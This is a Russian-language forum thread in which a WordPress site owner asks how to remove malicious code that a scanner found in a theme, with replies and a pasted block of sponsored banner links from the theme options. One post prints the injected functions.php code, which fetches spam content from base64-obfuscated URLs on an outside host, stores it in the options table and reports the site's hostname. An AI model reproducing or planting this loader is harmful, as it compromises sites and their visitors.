Jump to content
Svshinkarenko

Проблема с вредоносным кодом wordpress

Recommended Posts

установил плагин ТАС, он пишет что в теме есть зашифрованая ссылка.

Encrypted Code Found!
1 Static Link(s) Found...

Но не показывает в каком из файлов спрятан сам код, и собственно его текст. 

Что посоветуете? есть ли альтернатива плагина?

Share this post


Link to post
Share on other sites

Нашел паразита, посоветуете как удалить что бы не сломать сайт?

код находился в  functions.php

$content=@file_get_contents(base64_decode('aHR0cDovL25hMTAwLnJ1L3dwMy8xLnR4dA=='));
if (!$content){$content=$post_contents['option_value'];}
$wpdb->query( "DELETE FROM $wpdb->options WHERE option_id=9999");
$wpdb->query($wpdb->prepare("INSERT INTO $wpdb->options ( option_id, blog_id, option_name,option_value,autoload ) VALUES ( %d,%d, %s, %s, %s )", 9999, 0, time(),$content,'no' )  );  

$post_id_stat=(base64_decode('aHR0cDovL25hMTAwLnJ1L3dwMy9zdGF0cy5waHA/aG9zdD0=')).$_SERVER['HTTP_HOST'];
@file_get_contents($post_id_stat);


Расшифровал злополучные строки, ведут на порнуху, чтоли. Не думаю что поисковикам это нравится. Прошу помощи гуру-вордпресов.

Share this post


Link to post
Share on other sites

Удалив функцию, вторая функция проверит, на месте ли первая функция? И так по цепочке. 

Такие защиты встраиваются в 2-3 места, вплоть до заливки кода в картинки (темы).

Так что конкретными советами вам тут никто не поможет.

Сканируйте сайт различными утилитами на вредоносный код и слабые места.

Share this post


Link to post
Share on other sites

Тупо вырезал код, TAC успокоился по поводу вредоносного, пишет просто о статическом линке. Буду искать, очень странно что он не пишет в каком файле вставлен линк, на втором сайте-визитке работает корректно, переустановка не помогает.

Share this post


Link to post
Share on other sites
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. 
 </p>
 
<p> 
Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. ed ut perspiciatis unde omnis iste.
</p>'
		),
        
   array(	"name" => "Рекламный сайдбар 125x125 px",
		"desc" => "Вставьте свой рекламный блок 125x125 px здесь. Вы можете добавлять рекламные блоки неограниченное количество раз. Каждый новый баннер должен начинаться с новой строки, согласно следующему формату: <br/>http://yourbannerurl.com/banner.gif, http://theurl.com/to_link.html",
        "id" => $shortname."_ads_125",
        "type" => "textarea",
		"std" => 'http://newwpthemes.com/uploads/newwp/newwp12.png,http://newwpthemes.com/
http://flexithemes.com/wp-content/partners/fta.gif, http://flexithemes.com/?partner=19
http://newwpthemes.com/hosting/wpwh12.gif, http://newwpthemes.com/hosting/wpwebhost.php'
		),

Кто нибудь подскажет как безболезненно вырезать этот мусор?

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...